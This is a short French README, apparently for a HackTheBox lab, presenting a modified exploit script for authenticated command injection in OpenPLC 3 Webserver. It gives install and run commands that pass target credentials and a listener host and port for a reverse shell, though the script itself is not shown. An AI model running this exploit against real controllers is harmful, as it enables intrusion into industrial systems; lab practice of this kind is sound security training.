
OpenPLC 3 WebServer : exécution de code à distance authentifiée.
OpenPLC 3 WebServer : exécution de code à distance authentifiée.
La présence d'une injection de commandes dans Open PLC Webserver v3 permet à des attaquants distants d'exécuter du code arbitraire. Testé uniquement sur la machine HTB Wifinetictwo.htb.
J'ai rencontré des problèmes avec tous les scripts qui exploitent la vulnérabilité, peut-être parce que j'utilise Parrot ou mon navigateur ; Chromium fonctionne pour la connexion, j'ai eu des problèmes de connexion avec Firefox et quelque chose d'étrange se produit avec le serveur web lors de la requête POST de connexion.
J'ai modifié le script de thewhiteh4t. Certaines parties (principalement la méthode d'upload) sont simplement copiées, mais j'ai modifié la partie qui récupère les cookies du serveur pour lancer l'exploit.
Le PoC original est fourni par Fellipe Oliveira
J'espère que cela vous aidera si vous avez des problèmes.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
Sinon, vous pouvez modifier exploit.py
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass